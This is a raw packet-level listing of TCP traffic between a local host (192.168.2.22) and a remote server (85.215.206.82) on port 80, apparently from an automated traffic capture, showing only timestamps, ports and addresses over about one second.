Oct 23, 2024 17:27:19.457828045 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.457839012 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.457918882 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.457966089 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.457966089 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.457972050 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.458544970 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.458570004 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.458601952 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.458779097 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.458822966 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.458827019 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.458841085 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.458884954 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.479760885 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.479778051 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.479789972 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.479899883 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.479948997 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.479967117 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.479996920 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.479996920 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.480031967 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.502770901 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.502808094 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.502820015 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.502911091 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.502923012 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.503004074 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.503004074 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.503174067 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.503209114 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.503220081 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.503262043 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.543304920 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.543337107 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.543351889 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.543586969 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.577008009 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.577033997 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.577044964 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.577111959 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.577142000 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.577182055 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.577193975 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.577205896 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.577316046 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.577316046 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.577617884 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.577671051 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.577678919 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.577692032 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.577725887 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.599061012 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.599076033 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.599087954 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.599148035 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.599160910 CEST  80        49173     85.215.206.82   192.168.2.22
Oct 23, 2024 17:27:19.599208117 CEST  49173     80        192.168.2.22    85.215.206.82
Oct 23, 2024 17:27:19.599380970 CEST  49173     80        192.168.2.22    85.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.599386930 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.599411964 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.599421978 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.599452972 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.621387005 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.621411085 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.621423960 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.621479034 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.621509075 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.621563911 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.621572018 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.621583939 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.621628046 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.622010946 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.622023106 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.622035980 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.622062922 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.662961960 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.662991047 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.663002968 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.663187027 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.696258068 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696317911 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696330070 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696455002 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696468115 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696486950 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.696486950 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.696531057 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.696705103 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696724892 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696734905 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.696760893 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.718065977 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718079090 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718121052 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718132973 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718184948 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.718193054 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718206882 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718219995 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718347073 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.718347073 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.718730927 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718750954 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718761921 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.718801022 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.719119072 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.719136000 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.719186068 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.740539074 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740578890 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740591049 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740659952 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.740693092 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740704060 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740835905 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.740885019 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740940094 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740952015 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.740993023 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.781908989 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.781925917 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.781949043 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.782100916 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.815817118 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.815829992 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.815841913 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.815958977 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.815972090 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.815992117 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.816026926 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.816179991 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.816206932 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.816216946 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.816262960 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.837883949 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.837917089 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.837929010 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.837992907 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.838037014 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.838047981 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.838089943 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.838470936 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.838488102 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.838500023 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.838511944 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.838524103 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.838534117 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.838556051 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.839188099 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.839240074 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.859743118 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.859755993 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.859772921 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.859842062 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.859869957 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.859939098 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.859951019 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.859982967 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.860068083 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.860080004 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.860120058 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.900999069 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.901032925 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.901047945 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.901259899 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.934999943 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935017109 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935029030 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935040951 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935054064 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935065031 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935076952 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935092926 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935098886 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:19.935194016 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:19.935194016 CEST4917380192.168.2.2285.215.206.82
Oct 23, 2024 17:27:19.956890106 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.956914902 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.956947088 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.956969976 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:19.957103014 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.957115889 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.957129955 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.957144976 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:19.957173109 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:19.957603931 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.957673073 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.957685947 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.957711935 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:19.957789898 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.957803965 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.957827091 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:19.958441973 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.958487034 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:19.958498955 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.958509922 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.958549976 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:19.978842020 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.978938103 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.978948116 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.979022026 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:19.979057074 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.979068995 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.979082108 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.979094028 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:19.979101896 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:19.979135990 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:19.979868889 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.020299911 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.020318985 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.020333052 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.020463943 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.053706884 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.053730965 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.053742886 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.053889036 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.053894043 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.053900003 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.053913116 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.053942919 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.054073095 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.054085016 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.054126024 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.054711103 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.054766893 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.076139927 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.076174021 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.076184988 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.076251030 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.076265097 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.076278925 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.076287985 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.076317072 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.076827049 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.076839924 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.076852083 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.076880932 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.077003002 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.077055931 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.077434063 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.077446938 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.077460051 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.077481985 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.077673912 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.077723026 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.098951101 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.098967075 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.098980904 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.098994970 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.099005938 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.099018097 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.099031925 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.099044085 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.099050045 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.099066973 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.099085093 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.139612913 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.139631987 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.139646053 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.139743090 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.173077106 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.173093081 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.173110962 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.173124075 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.173137903 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.173151970 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.173208952 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.173212051 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.173223019 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.173228979 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.173274994 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.173898935 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.173914909 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.173922062 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.173979998 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.195615053 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.195755005 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.195766926 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.195780993 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.195791960 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.195805073 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.195811987 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.195817947 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.195867062 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.195887089 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.196208000 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.196306944 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.196320057 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.196374893 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.217197895 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.217407942 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.217441082 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.217536926 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.217600107 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.217645884 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.217655897 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.217727900 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.217745066 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.217780113 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.218202114 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.218322992 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.218381882 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.218462944 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.218475103 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.218492031 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.218522072 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.258784056 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.258804083 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.258817911 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.258963108 CEST  49173  80     192.168.2.22   85.215.206.82
Oct 23, 2024 17:27:20.292139053 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.292157888 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.292172909 CEST  80     49173  85.215.206.82  192.168.2.22
Oct 23, 2024 17:27:20.292213917 CEST  49173  80     192.168.2.22   85.215.206.82
